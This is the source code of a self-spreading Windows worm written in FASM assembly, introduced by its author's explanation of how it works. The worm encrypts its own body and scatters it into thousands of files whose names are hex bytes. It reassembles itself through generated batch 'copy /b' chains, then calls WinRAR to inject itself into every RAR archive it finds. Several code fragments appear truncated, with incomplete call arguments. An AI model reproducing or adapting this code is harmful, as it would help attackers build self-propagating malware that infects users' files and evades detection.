by Second Part To Hell
  by Second Part To Hell
  idead since summer 2005
  written in April-May 2006

  This is probably the most complex and morphic malware I've ever written.
  It uses two techniques, which I've explained in rRlf#6 (Over-File-Splitting
  and Code in Filename), but even more advanced.

  The worm arrives as .RAR file. When the user uncompress and run the start.bat
  file the worm starts.
  - First it combines all .tmp files to one .exe file. This works via function
    'copy'. The start.bat may look like this:

    - - -
    cd ipnimpvf
    copy enxk.tmp+af.tmp+gmst.tmp+ztlobb.tmp+bibxwf.tmp /b nqfaoj.exe
    - - -

    First it chances the directory to the worm-dir. Then it copies the first
    .tmp files to a .exe file and calls another .bat files, which continues:

    - - -
    copy nqfaoj.exe+k.tmp+xxon.tmp+jnq.tmp+fjpz.tmp+uxvhm.tmp+osoprk.tmp+m.tmp+acoq.tmp /b rllv.exe
    copy rllv.exe+xvkepmd.tmp+hg.tmp+bwnlu.tmp+nfvvjv.tmp+toslwjr.tmp+cynivedi.tmp+xxp.tmp+lxssucpv.tmp /b zplgrltq.exe
    - - -

    This will be continued until the whole first .exe file is generated. The
    generated .exe file will be executed then.

  - The second file (let's call it dechiff.exe for easier explanation - it has
    a random name) searchs for files from .000 - .ZZZ and copies all filenames
    (without extention) to the memory. When the last file (may not be .ZZZ, at
    my test now it is .35K) the memory will be converted to binary - why?
    All filenames are 1-4 HEX numbers, which means that every filename contains
    1-4 bytes of the real worm.

  - When dechiff.exe has converted all hex to binary, it searchs for *.txt.
    In this .txt file a XOR decryption key is saved, which is about
    10 byte - 20k byte dechiff.exe reads the content and decrypt the memory.

  - The new filecontent is complete and decrypt, and will be written to file
    called NRK.exe, which will be executed then. NRK.exe is the real worm file.

  Now the real worm starts:

  - The worm first generate a temporary copy of itself, and prepares everything
    (VirtualAllocs, temp directory, ect)

  - It generates a .txt file with random content. This could be 10byte-20k byte
    (recursive ending)

  - It encryptes the code of it's temporary copy with XOR - key=.txt file

  - It starts to generate the files, which represents it's own code. The files'
    numbering is the extention. The filename is a hex-number (1-4 byte).
    For instance: EB2B.000 <- This is the MZ-sign of the .exe header (crypted).

  - When the own file is changed to encrypted HEX-numbers in filenames, the
    worm starts to split the code of the dechiff.exe file (which is saved in
    the body of the worm). While splitting, the worm generates several combine
    .bat files - one of it is called start.bat. start.bat is outside of the
    worm-directory (with all other files), and will start the whole process.
    The splitted files are (3..10) bytes.

  - When the dechiff.exe and all combine files are finished, the spreading part
    starts. The worm searchs for *.RAR files in the current directory (most
    times the worm-directory) and in parent directory (directory of start.bat).

  - At infection, the worm generates two WinRAR strings:
    %ProgramFilesDir% (read from registry) + "\WinRAR\rar.exe a -y " + victim directory + victim name + "start.bat"
    %ProgramFilesDir% (read from registry) + "\WinRAR\rar.exe a -y " + victim directory + victim name + worm-directory-name

  - In the end, this strings will be executed via CreateProcess.

  The worm does not spread when WinRAR is not installed on the computer.
  At my tests, the worm-directory contains ~3.800-4.700 files. :)
  About 91% of the files are HEX-files. ~9% are .tmp (splitted dechiff.exe)
  The rest (~5-20 files) are .bat (combining dechiff.exe).
  And one .txt file: KEY for decrypting the worm.

  I know, this all is highly unusual - but where is the fun of doing usual things? :)

include '..\FASM\INCLUDE\'

	primary_decryption_code_length	EQU primary_decryption_code_end-primary_decryption_code
	inf_string_length1		EQU end_inf_str-inf_str

	memory_alloc	dd 0x0
	my_filename	dd 0x0
	hCreFile	dd 0x0
	new_filesize	dd 0x0
	hCrFiMap	dd 0x0
	hMapView	dd 0x0
	hCrypTxt	dd 0x0

	keysize 	dd 0x0

	trash_counter	dd 0x0

	bin2hex_1	db 0x0
	bin2hex_2	db 0x0
			db 0x0
	rnd_split_combine_buffer: times 12 db 0x0

	rand_name_buffer: times 8 db 0x0
	rnd_file_name:	  times 9 db 0x0
				  db 'txt',0x0

	new_filename:	  times 8 db 0x0
	    exe_ext:		  db '.exe',0x0

	hex_filename:	  times 8 db 0x0	; 8 Bytes Filename
				  db '.'	; '.'
	hex_extention:		  db '000'	; 3 Bytes Extention
	   zero_field:		  db 0x0	; 0-terminated String

	FALSE_F 	dd 0x0
	dotdot		db '..',0x0

	c_file_size	dd 0x0

	combine_name_size	db 0x0
	combine_name_size2	db 0x0
	combine_name		db 'start.bat', 0x0
	combine_data		dd 0x0
	combine_pointer 	dd 0x0
	combine_start		db 'copy '
	combine_b_space 	db ' '
	combine_b		db '/b'
	combine_space		db ' '
	combine_handle		dd 0x0

	split_handle		dd 0x0
	split_counter		db 0x0

	combine_cd		db 'cd '
	worm_dir:	times 8 db 0x0
	end_combine_cd		db 0x0D,0x0A
	GetCurrentDir_buffer:	times 255 db 0x0
	GetCDB_Size		dd 0x0
	program_dir_reg_subkey	db 'SOFTWARE\Microsoft\Windows\CurrentVersion',0x0
	program_dir_reg_value	db 'ProgramFilesDir',0x0
	reg_handle		dd 0x0
	reg_value_type		dd 0x0
	reg_buffer_size 	dd 0x25
	reg_buffer:  times 0x25 db 0x0			; Program-Dir-Buffer
		     times 21	db 0x0			; WinRAR-String-Buffer
	GCD:	     times 255	db 0x0			; Current-Directory-Buffer

	infection_extention	db '*.rar',0x0
	inf_handle		dd 0x0
	inf_str 		db '\WinRAR\rar.exe a -y '
	inf_string_length	dd 0x0
	save_inf_str_pointer	dd 0x0

  .dwFileAttributes   dd ?
  .ftCreationTime     FILETIME
  .ftLastAccessTime   FILETIME
  .ftLastWriteTime    FILETIME
  .nFileSizeHigh      dd ?
  .nFileSizeLow       dd ?
  .dwReserved0	      dd ?
  .dwReserved1	      dd ?
  .cFileName	      rb 260
  .cAlternateFileName rb 14

  StartUp_struct_cb		 dd 0
  StartUp_struct_lpReserved	 dd 0
  StartUp_struct_lpDesktop	 dd 0
  StartUp_struct_lpTitle	 dd 0
  StartUp_struct_dwX		 dd 0
  StartUp_struct_dwY		 dd 0
  StartUp_struct_dwXSize	 dd 0
  StartUp_struct_dwYSize	 dd 0
  StartUp_struct_dwXCountChars	 dd 0
  StartUp_struct_dwYCountChars	 dd 0
  StartUp_struct_dwFillAttribute dd 0
  StartUp_struct_dwFlags	 dd 0
  StartUp_struct_wShowWindow	 dw 0
  StartUp_struct_cbReserved2	 dw 0
  StartUp_struct_lpReserved2	 dd 0
  StartUp_struct_hStdInput	 dd 0
  StartUp_struct_hStdOutput	 dd 0
  StartUp_struct_hStdError	 dd 0


systemtime_struct:	       ; for random number
	  dw 0		       ; wYear
	  dw 0		       ; wMonth
	  dw 0		       ; wDayOfWeek
	  dw 0		       ; wDay
	  dw 0		       ; wHour
	  dw 0		       ; wMinute
	  dw 0		       ; wSecond
rnd:	  dw 0		       ; wMilliseconds

	; Now the code of dechiff.exe follows:
	include ''

	invoke	GetCommandLine		; Get the name of the running file
	inc	eax

	mov	[my_filename], eax	; Save the filename

	inc	eax
	cmp	byte [eax], '.'
   jne	get_my_name
	add	eax, 4
	mov	byte [eax], 0x0

	invoke	MessageBox, 0x0, "Eppur si muove! - Defend your opinion!", "Artwork by Second Part To Hell/rRlf", 0x0

	call	random_name			; Generate a random name
	mov	ecx, 8
	mov	esi, rnd_file_name
	mov	edi, new_filename
	rep	movsb				; Write the random name to 'new_filename'

	invoke	CopyFile, \			; Copy the own file, as access is denied while running
		[my_filename], \
		new_filename, \ 		; random name
	invoke	CreateFile, \			; Get the handle of the file
		new_filename, \
		0x0, \
		0x0, \
	mov	[hCreFile], eax

	invoke	GetFileSize, \			; Get the Filesize of the file
		[hCreFile], \
	mov	[new_filesize], eax
	mov	[c_file_size], primary_decryption_code_length

	invoke	CreateFileMapping, \		; Create a Map of the File
		[hCreFile], \
		0x0, \
		0x0, \
		[new_filesize], \
	mov	[hCrFiMap], eax

	invoke	MapViewOfFile, \		; Create a MapViewOfFile
		[hCrFiMap], \
		0x0, \
		0x0, \
	mov	[hMapView], eax

	call	random_name
	mov	byte [rnd_file_name+8], 0x0

	invoke	CreateDirectory, \		; Current directory=Worm directory
		rnd_file_name, \

	invoke	SetCurrentDirectory, \

	mov	esi, rnd_file_name
	mov	edi, worm_dir
	mov	ecx, 0x8
	rep	movsb				; Save the name of the worm-directory

	mov	byte [rnd_file_name+8], '.'
	call	random_name
	invoke	CreateFile, \
		rnd_file_name, \
		0x0, \
		0x0, \
	mov	[hCrypTxt], eax

	invoke	VirtualAlloc, \
		0x0, \
		0x10000, \		; 64 KB RAM
		0x1000, \
	mov	[memory_alloc], eax

	push	0x0				; =pointer=0x0
	call	random_number

	pop	eax
	push	eax
	call	random_number			; Generate 8 random numbers in rand_name_buffer
	mov	ecx, [rand_name_buffer+3]	; ecx=random dword
	and	ecx, 7				; ecx=00000000 00000000 00000000 00000???
	inc	ecx				; ecx!=0!
	cmp	ecx, 7				; ecx>8?
	jg	generate_crypt_key		; generate new random!
	mov	esi, rand_name_buffer		; From: rand_name_buffer
	mov	edi, [memory_alloc]		; To: memory
	pop	edx				; Get pointer
	add	edi, edx			; edi=memory_alloc+pointer
	add	edx, ecx			; Add number of written bytes to the counter
	push	edx				; Save pointer
	rep	movsb				; Write!
	call	random_number			; Get another random number

	xor	ebx,ebx
	mov	bx, word [rand_name_buffer+1]	; bx=???? ???? ???? ????
	add	bx, word [rand_name_buffer+3]
	add	bx, word [rand_name_buffer+5]
	cmp	ebx, 0x80
   jg  generate_crypt_key			; If not: Continue generating keys

	pop	eax				; Get KEY-size
	mov	[keysize], eax

	invoke	WriteFile, \			; Write the generated random code to the .txt file
		[hCrypTxt], \
		[memory_alloc], \
		[keysize], \
		FALSE_F, \

	invoke	CloseHandle, \			; Close the .txt file

	mov	ecx, [new_filesize]
	mov	edx, [new_filesize]		; EDX=filesize
	sub	edx, ecx			; EDX=filesize-ECX(bytes to write)
	mov	eax, [memory_alloc]		; EAX=pointer to random code in memory
	add	eax, edx			; EAX=pointer to current rnd byte in memory
	mov	al, byte [eax]			; Cryptor-Byte in AL
	mov	ebx, [hMapView] 		; EBX=Pointer to MapView
	add	ebx, edx			; EBX=Pointer to current byte of MapView
	mov	ah, byte [ebx]			; Byte to be encrypted in AH
	xor	ah, al				; Encrypt!
	mov	ebx, [hMapView] 		; Pointer of Mapped File to ebx
	add	ebx, edx			; Get the -to-encrypt- byte
	mov	[ebx], ah			; Move the encrypted Byte to Memory
   loop encrypt_map

	xor	ecx, ecx			; ECX=counter=0
	add	ecx, [hMapView]
	mov	al, byte [ecx]			; One Byte of Mapview to al
	sub	ecx, [hMapView]
	call	binary_to_hex			; Convert binary al to hex valie (AX)
	mov	ebx, ecx			; EBX=counter
	shl	ebx, 1				; EBX*=2
	add	ebx, [memory_alloc]
	mov	word [ebx], ax			; Write HEX-Value
	inc	ecx				; Increase the counter
	cmp	ecx, [new_filesize]		; ECX=filesize?
   jne	write_hex_to_memory			; If yes, stop writing

	mov	ecx, [new_filesize]		; ecx=filesize
	shl	ecx, 1				; ecx*=2 = Size of byte to write (the HEX-values)
	mov	[trash_counter], ecx		; trash_counter=counter
	mov	eax, [trash_counter]		; If trash_counter < 0x8  -> AL=trash_counter
	cmp	[trash_counter], 0x8		; Compare if trash_counter <=8
	jle	make_last_hex_file		; If so, goto end of writing
	call	random_name
	call	random_byte			; al=random number
	xor	al, byte [rand_name_buffer]
	xor	al, byte [rand_name_buffer+2]
	xor	al, byte [rand_name_buffer+4]
	xor	al, byte [trash_counter]
	and	eax, 0x7			; al=0000 0???
	inc	al				; At least 0x1
	mov	ebx, [new_filesize]		; EBX=Filesize
	shl	ebx, 1				; EBX=Bytes to write
	sub	ebx, [trash_counter]		; EBX=Already written bytes
	sub	[trash_counter], eax		; Decrease the bytes to write by the bytes which will be written
						; Dumb Info: The last 2 lines costed me ~1.5h of bug-searching :))
	add	ebx, [memory_alloc]		; EBX=Pointer where to start to write
	call	Create_Hex_File 		; Create the file now
   jmp	generate_hex_files

	mov	ebx, [new_filesize]
	shl	ebx, 1
	sub	ebx, [trash_counter]
	add	ebx, [memory_alloc]
	call	Create_Hex_File 		; Now all files have been written

	invoke	UnmapViewOfFile, \

	invoke	CloseHandle, \

	invoke	CloseHandle, \			; Close File

	mov	ecx, primary_decryption_code_length
	mov	esi, primary_decryption_code
	mov	edi, [memory_alloc]
	rep	movsb

	mov	eax, rnd_file_name		; RND-pointer in eax
	add	eax, 8				; add 8 to pointer (='.' of filename)
	mov	dword [eax], '.tmp'		; instate of '.tmp', '.exe'

	invoke	VirtualAlloc, \ 		; Reserve Space in Memory
		0x0, \
		0x120000, \
		0x1000, \

	mov	[combine_data], eax				; Save the pointer to it.
	mov	[combine_pointer], eax				; Save again

	invoke	SetCurrentDirectory, \				; Create the start.bat outside of the directory

	invoke	CreateFile, \					; Create start.bat file
		combine_name, \
		0x0, \
		0x0, \

	mov	[combine_handle], eax

	mov	esi, combine_cd
	mov	edi, [combine_pointer]
	mov	ecx, 13
	rep	movsb					; Write 'cd randfolder'\n

	add	[combine_pointer], 13

	mov	byte [end_combine_cd], 0x0

	invoke	SetCurrentDirectory, \

	mov	ebp, 0xABA9AB
	call	random_name

	mov	esi, combine_start				; What to write
	mov	edi, [combine_pointer]				; Where to write
	mov	ecx, 5						; How much to write
	rep	movsb						; Write!

	add	[combine_pointer], 5				; Get next empty byte to write


	call	random_number
	mov	al, [combine_name_size]
	xor	al, byte [rand_name_buffer]
	add	al, byte [rand_name_buffer+5]
	sub	al, byte [rand_name_buffer+2]
	xor	al, byte [rand_name_buffer+4]
	xor	al, byte [rand_name_buffer+1]
	xor	al, byte [rand_name_buffer+3]
	and	al, 0x07					; AL < 7
	mov	[combine_name_size], al

	mov	ebp, 0xAAAAAAAA 				; Influences the random engine
	call	random_name					; random name in rnd_file_name

	xor	eax, eax					; EAX=0
	add	al, [combine_name_size] 			; EAX=(0..7)
	add	eax, rnd_file_name				; EAX=rnd_file_name+(0..7)

	invoke	CreateFile, \
		eax, \
		0x0, \
		0x0, \

	cmp	eax, INVALID_HANDLE_VALUE			; If file already existed
	je	OFS_main_loop					; then get a new file-name

	mov	[split_handle], eax			; Save the file-handle

	call	random_number				; Get random number
	xor	eax, eax				; eax=0
	mov	al, [rand_name_buffer]			; al~=random
	and	al, 7					; al= 0000 0???
	add	al, 3					; At least three byte
	mov	[split_counter], al			; Save that bytes

	sub	[c_file_size], eax			; Decrease the bytes to write

	invoke	WriteFile, \				; Write (1..8) byte
		[split_handle], \
		[memory_alloc], \
		eax, \
		FALSE_F, \

	invoke	CloseHandle, [split_handle]		; Close the file

	xor	eax, eax
	mov	al, [split_counter]			; How many bytes written
	add	[memory_alloc], eax			; Add the pointer - write the next few bytes next time

	mov	esi, rnd_file_name			; From: Filename-buffer
	xor	eax, eax
	add	al, [combine_name_size] 		; EAX=(0..7)
	add	esi, eax				; ESI=Pointer to rnd-name+(0..7)
	mov	edi, [combine_pointer]			; To: compainer-pointer
	mov	ecx, 12 				; 8+strlen('.xxx')
	sub	ecx, eax				; ECX=(0..7)+strlen('.xxx')
	rep	movsb					; Write!

	add	[combine_pointer], 12			; Add 12 to pointer
	sub	[combine_pointer], eax			; Subtract (0..7)

	mov	eax, [combine_pointer]			; Pointer to eax

	mov	byte [eax], '+' 			; Move '+' to the code's memory
	inc	[combine_pointer]			; Increase the pointer

	xor	ebx, ebx
	mov	bx, word [rand_name_buffer+1]		; bx=???? ???? ???? ????
	xor	bx, word [rand_name_buffer+3]
	add	bx, word [rand_name_buffer+5]
	add	bx, word [rand_name_buffer+3]
	cmp	ebx, 0x2FFF
	jg	OFS_cmp_end

	call	combine_next_line			; New line in combine-file


	cmp	[c_file_size], 0x0			; Compare if more bytes to write
    jg	OFS_main_loop					; If yes, jmp to main_loop

	mov	eax, [combine_pointer]		; eax=pointer
	dec	eax				; Delete the last '+'
	mov	byte [eax], 0x20		; Add a space

	mov	esi, combine_b					; What to write
	mov	edi, [combine_pointer]				; Where to write
	mov	ecx, 3						; How much to write
	rep	movsb						; Write!

	add	[combine_pointer], 4				; Get next empty byte to write

	mov	ebp, 0xAAAAAAAA 		; Influences the random engine
	call	random_number			; random name in rnd_file_name

	mov	eax, rnd_file_name		; RND-pointer in eax
	add	eax, 8				; add 8 to pointer (='.' of filename)
	mov	dword [eax], '.exe'		; instate of '.tmp', '.exe'

	dec	[combine_pointer]
	mov	esi, rnd_file_name		; From: rnd_file_name
	mov	edi, [combine_pointer]		; To: compainter_pointer
	mov	ecx, 12 			; How much: 12 bytes
	rep	movsb				; Write

	add	[combine_pointer], 12		; Add 12, to get the end again

	mov	eax, [combine_pointer]		; eax=pointer to content
	mov	word [eax], 0x0A0D		; Next Line
	add	[combine_pointer], 2

	mov	esi, rnd_file_name		; From: rnd_file_name
	mov	edi, [combine_pointer]		; To: compainter_pointer
	mov	ecx, 12 			; How much: 12 bytes
	rep	movsb				; Write

	add	[combine_pointer], 12		; Add 12, to get the end again

	mov	eax, [combine_data]
	sub	[combine_pointer], eax

	invoke	WriteFile, \			; Write the last .bat file
		[combine_handle], \
		[combine_data], \
		[combine_pointer], \
		FALSE_F, \

	invoke	CloseHandle, \			; Close the last .bat file

	invoke	SetCurrentDirectory, \		; Out of the worm-directory

	invoke	DeleteFile, \			; Delete the temporariely copy of the worm file

	invoke	RegOpenKeyEx, \ 		; Open the reg-key for getting the ProgramDir-Path
		program_dir_reg_subkey, \
		0x0, \

	invoke	RegQueryValueEx, \		; Read the info
		[reg_handle], \
		program_dir_reg_value, \
		0x0, \
		reg_value_type, \
		reg_buffer, \

	invoke	RegCloseKey, \					; Close reg-key

	xor	ecx, ecx
    find_end_zero_loop: 					; Find the end of the value-string
	mov	eax, reg_buffer
	add	eax, ecx
	inc	ecx
	cmp	byte [eax], 0x0 				; If zero=END
    jne find_end_zero_loop

	sub	eax, reg_buffer

	mov	esi, inf_str
	mov	edi, reg_buffer
	add	edi, eax
	mov	ecx, inf_string_length1
	rep	movsb						; Append the WinRAR-string to the %ProgramFilesDir%

	add	eax, inf_string_length1
	dec	eax
	mov	[inf_string_length], eax

	invoke	GetCurrentDirectory, \
		0x100, \

	xor	ecx, ecx
    find_GCD_zero_loop: 					; Find the end of the Current-Dir-string
	mov	eax, GetCurrentDir_buffer
	add	eax, ecx
	inc	ecx
	cmp	byte [eax], 0x0 				; If zero=END
    jne find_GCD_zero_loop

	sub	eax, GetCurrentDir_buffer
	mov	[GetCDB_Size], eax

	mov	esi, GetCurrentDir_buffer
	mov	edi, GCD
	mov	ecx, [GetCDB_Size]
	rep	movsb						; Write a temp GetCurDir-String

	call	Find_RAR_Files_And_Infect			; Call the Infection Functions

	invoke	SetCurrentDirectory, \				; The worm-file is generated in the worm-directory
		dotdot						; (hardly any .RARs)so we should go out, infect other dirs

	call	ChangeDirString 				; Change the path of the current directory

	call	Find_RAR_Files_And_Infect			; And infect!

	invoke	ExitProcess, 0x0

; Generate a file with code (converted to HEX) in the filename
; In:  al  = Bytes of filename (without extention)
;      ebx = Pointer of filename-content
; Anything changed!

	mov	dword [hex_filename+0], 0x0
	mov	dword [hex_filename+4], 0x0

	xor	ecx, ecx		; ECX=0
	mov	cl, al			; ECX=bytes of filename
	mov	esi, ebx		; ESI=Source=Pointer filename-content
	mov	al, 0x8 		; Maximal filesize
	sub	al, cl			; MAX-REAL=DIF
	and	eax, 0xFF		; eax= 0000 00FF
	mov	edi, hex_filename	; EDI=Destination=Buffer for filename
	add	edi, eax		; Real place to write
	rep	movsb			; Write

	add	eax, hex_filename

	invoke	CreateFile, \
		eax, \
		0x0, \
		0x0, \

	invoke	CloseHandle, \

	mov	eax, hex_extention+2	; Pointer to 3rd byte in extention
	cmp	byte [eax], '9' 	; Is it '9'?
	je	hex_ext_counter_9_A	; If yes, make a 'A'

	cmp	byte [eax], 'Z' 	; Is it 'Z'?
	je	hex_ext_counter_Z_0

	inc	byte [eax]		; Increase extention-counter

; In:  eax = Pointer to byte to change
; Out: [eax]='A'

	mov	byte [eax], 'A' 	; Increase extention-counter

hex_ext_counter_Z_0:			; My first recursive function in asm :)
	mov	byte [eax], '0' 	; Increase extention-counter
	dec	eax
	cmp	byte [eax], '9'
	je	hex_ext_counter_9_A

	cmp	byte [eax], 'Z'
	je	hex_ext_counter_Z_0

	inc	byte [eax]

; Convert a binary byte to a hex-number
; In:  al = binary byte
; Out: ax = hex-value
; Nothing else changed

	mov	word [bin2hex], 0x3030		; Code of "00"
	mov	ah, al				; ah=al
	and	al, 0x0F			; al=0000 ????

	push	binary_to_hex_RJ_1		; Offset of return jmp to stack

	cmp	al, 0x0A			; Is al > 10
	jge	bin2hex_inc_al			; If yes, increase AL:
						; ASCII '0' = 0x30
						; ASCII '9' = 0x39
						; ASCII 'A' = 0x41
						; 'A'-'9' = 0x41-0x39 = 8-1 = 7

	mov	[trash_counter], ebx		 ; We did not need the retrun value
	pop	ebx				 ; Get it back
	mov	ebx, [trash_counter]		 ; Restore ebx

	add	byte [bin2hex_2], al		; '0'+al

	shr	ah, 4				; ah = ???? ---- -> 0000 ????
	mov	al, ah				; al = ah

	push	binary_to_hex_RJ_2

	cmp	al, 0x0A
	jge	bin2hex_inc_al

	mov	[trash_counter], ebx
	pop	ebx
	mov	ebx, [trash_counter]
	add	byte [bin2hex_1], al

	mov	ax, word [bin2hex]		; HEX-value to ax

	add	al, 7				; al += 7  <- If al > "9" then ASCII-number + 7

	pop	edi				; Get value of stack
	push	edi				; Back to the stack
	mov	ecx, 8				; ecx=counter
	mov	dh, 0xAA			; dh: changes in the function and makes the number little bit more random
	mov	dl, 0x87			; same as dh
	push	dx				; Save dx at stack
	push	ecx				; Save counter at stack
	call	random_byte			; Random number in al
	pop	ecx				; get counter
	xor	al, cl				; Counter influences pseudo random number
	pop	dx				; Get dx
	push	ecx
	xor	dx, cx				; Counter influences influncing number
	add	dh, al				; Random number influences influencing number
	sub	dl, al				; Same as dh
	neg	dl				; Neg dl
	xor	dl, dh				; dl XOR dh -> more variability
	xor	al, dl				; random number changes
	sub	ax, di				; value of stack influences random number
	add	ax, dx				; ax+dx
	mov	dl, [rand_name_buffer+ecx-2]
	mov	dh, byte [rand_name_buffer+ecx-3]    ; dx=???? ???? ????? ?????
	sub	al, dl				; al-=dl
	add	al, dh				; al+=dh
	mov	ah, dl				; ah=dl
	push	ax				; AX to stack
	mov	cl, 1				; cl=1
	or	dh, cl				; dh is at least 1 (to reduce chance of result=zero)
	mul	dh				; AL=AX*DH
	pop	cx				; CX=old AX
	push	cx				; To stack again
	add	cl, al				; CL+=AL
	sub	cl, ah				; CL-=AH
	xchg	al, cl				; AL=CL
	mov	cx, bp				; cx=bp
	mul	cl				; AX=AL*CL
	neg	ah				; NEG AH
	xor	al, ah				; xor AL and AH
	pop	cx				; get old AX
	sub	cl, al				; SUB
	add	cl, dl				; cl+=old random number
	sub	al, cl				; al ~=random :)
	pop	ecx				; Get counter
	mov	byte [rand_name_buffer+ecx-1], al    ; Save random letter
   loop random_name_loop

	call	random_number			; Get 8 random bytes
	mov	ecx, 8				; counter=8, as we want to do it 8 times

	mov	al, byte [rand_name_buffer+ecx-1]    ; Get a letter
	mov	bl, 10				; BL=10
	xor	ah, ah				; AX: 0000 0000 ???? ????
	div	bl				; AL=rnd/10=number between 0 and 25
	add	al, 97				; Add 97 for getting lowercase letters
	mov	[rnd_file_name+ecx-1], al	; Save random letter
   loop changetoletter

	invoke	GetSystemTime, systemtime_struct	; Get first number
	mov	ebx, [rnd-2]				; ebx=number
	add	ebx, edx				; Making it pseudo-independent of time
	sub	ebx, ecx
	xor	ebx, eax
	xchg	bl, bh
	pop	ecx
	push	ecx
	neg	ebx
	xor	ebx, ecx				; ebx=pseudo-indepentend number

	invoke	GetTickCount				; Get second number
	xor	eax, ecx				; eax=number
	neg	ax					; Making it pseudo-independent of time
	xor	eax, edx
	xor	ah, al
	sub	eax, ebp
	add	eax, esi				; eax=pseudo-indepentend number

	xor	eax, ebx				; Compain the numbers -> eax
	mov	ebx, eax				; Save eax
	shr	eax, 8					; e-part -> ax
	xor	ax, bx
	xor	al, ah					; al=number

	mov	eax, [combine_pointer]				; eax=pointer
	dec	eax						; Delete the last '+'
	mov	byte [eax], 0x20				; Add a space
	inc	[combine_pointer]				; Increase pointer again

	mov	ebp, 0xAAAAAAAA 				; Influences the random engine
	call	random_name					; random name in rnd_file_name

	mov	eax, rnd_file_name				; RND-pointer in eax
	add	eax, 8						; add 8 to pointer (='.' of filename)
	mov	dword [eax], '.exe'				; instate of '.tmp', '.exe'

	dec	[combine_pointer]

	mov	esi, combine_b					; copy [source] /b [destination]
	mov	edi, [combine_pointer]
	mov	ecx, 3
	rep	movsb

	add	[combine_pointer], 3

	mov	esi, rnd_file_name				; From: rnd_file_name
	xor	eax, eax
	mov	al, [combine_name_size]
	add	esi, eax					; ESI=Pointer to RND-Name+(0..7)
	mov	edi, [combine_pointer]				; To: compainter_pointer
	mov	ecx, 12
	sub	ecx, eax
	rep	movsb						; Write

	add	[combine_pointer], 12				; Add 12, to get the end again
	xor	eax, eax
	mov	al, [combine_name_size]
	sub	[combine_pointer], eax

	mov	eax, [combine_pointer]				; eax=pointer to content
	mov	word [eax], 0x0A0D				; Next Line
	add	[combine_pointer], 2

	call	random_number
	and	byte [rand_name_buffer+4], 0x03 		; rand_name_buffer+4 < 4
	cmp	byte [rand_name_buffer+4], 0x00 		; rand_name_buffer+4 = 0 ?
	je	combine_file_split				; If yes, close current combine file,
								; make a new one,
								; call it and continue

	mov	esi, combine_start				; What to write
	mov	edi, [combine_pointer]				; Where to write
	mov	ecx, 5						; How much to write
	rep	movsb						; Write!

	add	[combine_pointer], 5				; Get next empty byte to write

	mov	esi, rnd_file_name				; From: rnd_file_name
	xor	eax, eax
	mov	al, [combine_name_size]
	add	esi, eax
	mov	edi, [combine_pointer]				; To: compainter_pointer
	mov	ecx, 12 					; How much: 12 bytes
	sub	ecx, eax
	rep	movsb

	add	[combine_pointer], 12
	sub	[combine_pointer], eax

	mov	eax, [combine_pointer]
	mov	byte [eax], '+'
	inc	[combine_pointer]

	mov	eax, rnd_file_name				; RND-pointer in eax
	add	eax, 8						; add 8 to pointer (='.' of filename)
	mov	dword [eax], '.tmp'				; instate of '.tmp', '.exe'

	mov	esi, rnd_file_name
	mov	edi, rnd_split_combine_buffer
	mov	ecx, 12
	rep	movsb						; Save last filename

	mov	eax, rnd_file_name				; RND-pointer in eax
	add	eax, 8						; add 8 to pointer (='.' of filename)
	mov	dword [eax], '.bat'				; instate of '.bat', '.exe'

	call	random_number
	mov	al, [combine_name_size]
	xor	al, byte [rand_name_buffer]
	add	al, byte [rand_name_buffer+5]
	sub	al, byte [rand_name_buffer+2]
	xor	al, byte [rand_name_buffer+4]
	xor	al, byte [rand_name_buffer+1]
	xor	al, byte [rand_name_buffer+3]
	and	al, 0x07					; AL < 7
	mov	[combine_name_size2], al

	call	random_name

	xor	eax, eax					; EAX=0
	add	al, [combine_name_size2]			; EAX=(0..7)
	add	eax, rnd_file_name				; EAX=rnd_file_name+(0..7)

	invoke	CreateFile, \					; Create the new .bat file
		eax, \
		0x0, \
		0x0, \

	cmp	eax, INVALID_HANDLE_VALUE			; If file already existed
	je	CFS_loop

	push	eax						; Save the new file handle

	mov	esi, rnd_file_name
	xor	ebx, ebx
	mov	bl, [combine_name_size2]
	add	esi, ebx
	mov	edi, [combine_pointer]
	mov	ecx, 12
	sub	ecx, ebx
	rep	movsb						; Write the name of the new .bat file

	add	[combine_pointer], 12
	sub	[combine_pointer], ebx

	mov	eax, [combine_data]
	sub	[combine_pointer], eax

	invoke	WriteFile, \					; Write the file
		[combine_handle], \
		[combine_data], \
		[combine_pointer], \
		FALSE_F, \

	invoke	CloseHandle, [combine_handle]			; Close the old .bat file

		; Now let's prepare anything for the new file

	pop	[combine_handle]				; Get the handle of the new .bat file again

	mov	eax, [combine_pointer]

	mov	eax, [combine_data]
	mov	[combine_pointer], eax				; [combine_pointer] = Start of virtual Alloc

	mov	esi, combine_start
	mov	edi, [combine_pointer]
	mov	ecx, 5
	rep	movsb						; Write 'copy '

	add	[combine_pointer], 5

	mov	esi, rnd_split_combine_buffer
	xor	eax, eax
	mov	al, [combine_name_size]
	add	esi, eax
	mov	edi, [combine_pointer]
	mov	ecx, 12
	add	ecx, eax
	rep	movsb						; Write previous filename

	add	[combine_pointer], 12
	sub	[combine_pointer], eax

	mov	eax, [combine_pointer]
	mov	byte [eax], '+'
	inc	[combine_pointer]

	mov	eax, rnd_file_name				; RND-pointer in eax
	add	eax, 8						; add 8 to pointer (='.' of filename)
	mov	dword [eax], '.tmp'				; instate of '.tmp', '.bat'

	invoke	FindFirstFile, \		; Find the first .RAR file
		infection_extention, \

	cmp	eax, INVALID_HANDLE_VALUE	; Last File?
	je	End_Find_RARs			; If yes, stop program

	mov	[inf_handle], eax		; Save the search-handle for *.RAR files

	invoke	SetCurrentDirectory, \

	call	Infect_RAR			; INFECT IT!

	invoke	FindNextFile, \ 		; Get next .RAR file
		[inf_handle], \

	cmp	eax, 0x0			; Last File?
	je	End_Find_RARs			; If yes, stop program

   jmp	find_rar_loop

	invoke	FindClose, \			; Close the search-handle for *.RAR files


	mov	eax, [combine_data]
	mov	[combine_pointer], eax

	mov	esi, reg_buffer
	mov	edi, [combine_pointer]
	mov	ecx, [inf_string_length]
	rep	movsb						; Write the infection string to the memory

	mov	eax, [inf_string_length]
	sub	eax, 3
	add	[combine_pointer], eax

	mov	esi, GetCurrentDir_buffer
	mov	edi, [combine_pointer]
	mov	ecx, [GetCDB_Size]
	rep	movsb						; Write the path of the victim file before the filename

	mov	eax, [GetCDB_Size]
	add	[combine_pointer], eax

	mov	eax, [combine_pointer]

	mov	byte [eax], '\'
	inc	[combine_pointer]
	xor	ecx, ecx
    find_zero_loop:						; Find the end of the name-string
	mov	eax, WIN32_FIND_DATA.cFileName
	add	eax, ecx
	inc	ecx
	cmp	byte [eax], 0x0 				; If zero=END
    jne find_zero_loop

